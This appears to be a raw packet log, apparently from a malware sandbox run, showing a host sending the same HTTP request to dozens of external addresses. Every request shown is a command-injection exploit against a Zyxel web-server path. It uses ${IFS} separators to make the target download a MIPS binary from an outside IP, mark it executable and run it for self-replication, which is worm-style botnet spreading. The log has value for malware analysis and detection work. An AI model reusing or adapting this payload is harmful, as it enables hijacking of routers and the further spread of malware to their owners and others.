                                            Jan 14, 2024 15:50:51.649801016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7589192.168.2.2360452130.143.159.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649833918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7590192.168.2.2343868142.175.214.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649869919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7591192.168.2.2350902205.189.166.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649907112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7592192.168.2.2359960177.249.123.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649945021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7593192.168.2.2340378101.78.251.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649949074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7594192.168.2.2357790182.131.26.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649981022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7595192.168.2.2337272124.173.122.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650005102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7596192.168.2.2340392182.63.100.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650005102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7597192.168.2.2359744187.157.87.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650053024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7598192.168.2.235814296.83.40.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650084972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7599192.168.2.2340710115.137.212.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650084972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7600192.168.2.2340046164.122.17.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650105953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7601192.168.2.233679837.128.101.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650131941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7602192.168.2.2341316148.210.156.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650199890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7603192.168.2.233707213.72.13.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650228977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7604192.168.2.2337916128.6.62.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650260925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7605192.168.2.2334142115.31.47.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650288105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7606192.168.2.235273223.93.26.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650329113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7607192.168.2.2354160150.186.175.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650368929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7608192.168.2.235819223.220.163.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650382996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7609192.168.2.234667872.225.194.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650414944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7610192.168.2.233461035.131.223.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650464058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7611192.168.2.235385089.11.15.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650470972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7612192.168.2.2344550141.209.102.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650502920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7613192.168.2.2358966213.195.189.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650549889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7614192.168.2.235684098.36.201.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650574923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7615192.168.2.234096674.9.219.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650585890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7616192.168.2.2337738190.186.14.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650628090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7617192.168.2.2345318117.219.126.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650665998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7618192.168.2.2348340216.128.125.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650667906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7619192.168.2.2334692132.91.146.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650723934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7620192.168.2.2343176148.235.184.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650751114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7621192.168.2.2348580153.10.255.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650780916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7622192.168.2.2344656210.132.170.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650801897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7623192.168.2.23487384.41.23.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650835991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7624192.168.2.235812263.179.160.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650866032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7625192.168.2.2359678178.165.196.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650911093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7626192.168.2.2333028147.58.11.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650934935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7627192.168.2.2345478200.77.233.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650955915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7628192.168.2.234782284.105.223.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.650973082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7629192.168.2.233494849.80.119.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651009083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7630192.168.2.2346668171.51.60.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651046038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7631192.168.2.234331841.212.33.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651062965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7632192.168.2.2337664116.77.22.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651112080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7633192.168.2.233384648.254.15.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651144028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7634192.168.2.2339402184.17.41.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651169062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7635192.168.2.2350156176.227.138.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651196003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7636192.168.2.2345508150.227.145.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651227951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7637192.168.2.2351482151.128.248.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651233912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7638192.168.2.2338402205.186.206.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651252031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7639192.168.2.235493885.20.209.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651316881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7640192.168.2.2353014217.48.205.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651357889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7641192.168.2.2353652198.81.167.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651379108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7642192.168.2.2338498202.132.110.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.651418924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7643192.168.2.2335044164.98.201.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655004025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7644192.168.2.235355674.119.103.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655019045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7645192.168.2.2350258136.152.212.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655055046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7646192.168.2.2351894210.169.135.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655083895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7647192.168.2.2341334144.246.32.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655123949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7648192.168.2.2349284141.205.164.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655133963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7649192.168.2.2337442172.221.147.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655167103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7650192.168.2.2339102147.229.215.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655209064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7651192.168.2.234553412.110.66.45443
                                            TimestampBytes transferredDirectionData
